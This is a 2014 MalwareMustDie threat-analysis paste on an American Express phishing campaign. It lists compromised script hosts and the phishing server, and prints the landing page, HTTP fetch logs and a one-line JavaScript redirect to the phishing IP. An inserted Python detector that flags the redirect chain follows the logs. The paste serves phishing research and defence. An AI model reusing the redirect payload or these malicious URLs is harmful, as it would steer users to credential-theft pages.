American Express Phishing April 12 2014

MalwareMustDie Apr 12th, 2014
// #MalwareMustDie! $ date
// Sat Apr 12 13:28:40 JST 2014
// Case: American Express Phishing April 12 2014
// Analysis base: http://blog.malwaremustdie.org/2014/02/one-upn-time-with-american-express.html

// Landings:


// Remote Scripts:

http://bvh.cwsurf.de/slogan/transplant.js                       85.195.104.20
http://debbixler.com/pulley/lifeguard.js                        72.167.186.171
http://electricwinches.co.uk/lofting/retiring.js                91.186.1.215
http://mcnabconstruction.com/morton/cetaceans.js                91.186.1.166

// Phishing site:

http://218.234.108.131:8080/americanexpress/                    218.234.108.131

// IP complete translation (Reverse|ISP|Location)


// The Landing PoC

GET /hellishly/flotilla.html HTTP/1.1
Host: www.inversionesdecolombia.co
Referer: http://MalwareMustDieHatesPhishing.org
  :
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 04:17:12 GMT
Server: Apache/2.4.6 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Fri, 11 Apr 2014 15:15:26 GMT
Accept-Ranges: bytes
Content-Length: 532
Connection: close
Content-Type: text/html
200 OK
Length: 532 [text/html]
Saving to: './sample.mmd'

// The Remote Script PoC

$ cat sample.mmd
<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
<script type="text/javascript" src="http://bvh.cwsurf.de/slogan/transplant.js"></script>
<script type="text/javascript" src="http://debbixler.com/pulley/lifeguard.js"></script>
<script type="text/javascript" src="http://electricwinches.co.uk/lofting/retiring.js"></script>
<script type="text/javascript" src="http://mcnabconstruction.com/morton/cetaceans.js"></script>

</html>

// The Script Redirector PoC

Resolving bvh.cwsurf.de (bvh.cwsurf.de)... 85.195.104.20
Caching bvh.cwsurf.de => 85.195.104.20
Connecting to bvh.cwsurf.de (bvh.cwsurf.de)|85.195.104.20|:80... connected.
GET /slogan/transplant.js HTTP/1.1
Referer: http://pointcanada.com/lakshmi/specter.html
Host: bvh.cwsurf.de
 :
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 04:14:29 GMT
Server: Apache
Last-Modified: Fri, 11 Apr 2014 22:59:02 GMT
ETag: "90c011c-41-4f6cc479c1af1"
Accept-Ranges: bytes
Content-Length: 65
Connection: close
Content-Type: application/javascript
200 OK
Length: 65 [application/javascript]
Saving to: './sample.mmd'

$ cat sample.mmd
document.location='http://218.234.108.131:8080/americanexpress/';

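The hand-off shown above (a stub landing page whose only payload is off-host script tags, each script being a one-line location assignment to an IP-literal phishing URL) can be checked mechanically from captured samples. The following is an added example, not part of this paste or of MalwareMustDie's own tooling: it parses the landing HTML for script tags loaded from hosts other than the landing host, extracts the redirect target from a fetched script body, and flags the chain when it ends at an IP-literal URL. The landing HTML and the one script body are the samples shown above; the other three script bodies are assumed unfetched and map to None.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Landing page body captured in the paste (sample.mmd), embedded inline as sample input.
LANDING_URL = "http://www.inversionesdecolombia.co/hellishly/flotilla.html"
LANDING_HTML = """<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
<script type="text/javascript" src="http://bvh.cwsurf.de/slogan/transplant.js"></script>
<script type="text/javascript" src="http://debbixler.com/pulley/lifeguard.js"></script>
<script type="text/javascript" src="http://electricwinches.co.uk/lofting/retiring.js"></script>
<script type="text/javascript" src="http://mcnabconstruction.com/morton/cetaceans.js"></script>
</html>"""
# Only the first remote script body appears in the paste; the other three are assumed unfetched.
SCRIPT_BODIES = {
    "http://bvh.cwsurf.de/slogan/transplant.js":
        "document.location='http://218.234.108.131:8080/americanexpress/';",
}

class _ScriptSrcParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.srcs.append(src)

# Bare JS redirect: document.location = '...' (also window.location / .href forms).
_LOCATION_RE = re.compile(r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")
_IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def external_scripts(html, page_url):
    """Script URLs the landing page loads from hosts other than its own."""
    p = _ScriptSrcParser()
    p.feed(html)
    own = urlparse(page_url).hostname
    return [s for s in p.srcs if urlparse(s).hostname not in (None, own)]

def redirect_target(js):
    m = _LOCATION_RE.search(js)
    return m.group(1) if m else None

def resolve_chain(html, page_url, bodies):
    """Landing page -> each off-host script -> its redirect target (None if unfetched)."""
    return {s: redirect_target(bodies.get(s, "")) for s in external_scripts(html, page_url)}

def is_phish_redirector(html, page_url, bodies):
    """True when an off-host script redirects the browser to an IP-literal URL, as here."""
    targets = [t for t in resolve_chain(html, page_url, bodies).values() if t]
    return any(_IPV4_RE.fullmatch(urlparse(t).hostname or "") for t in targets)
```

Run against proxy or sandbox captures, the same functions also give the block list for the script hosts and the final destination.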
// The rest of the information is similar to the posted blog.

---
#MalwareMUSTDie!
Analysis:  @unixfreaxjp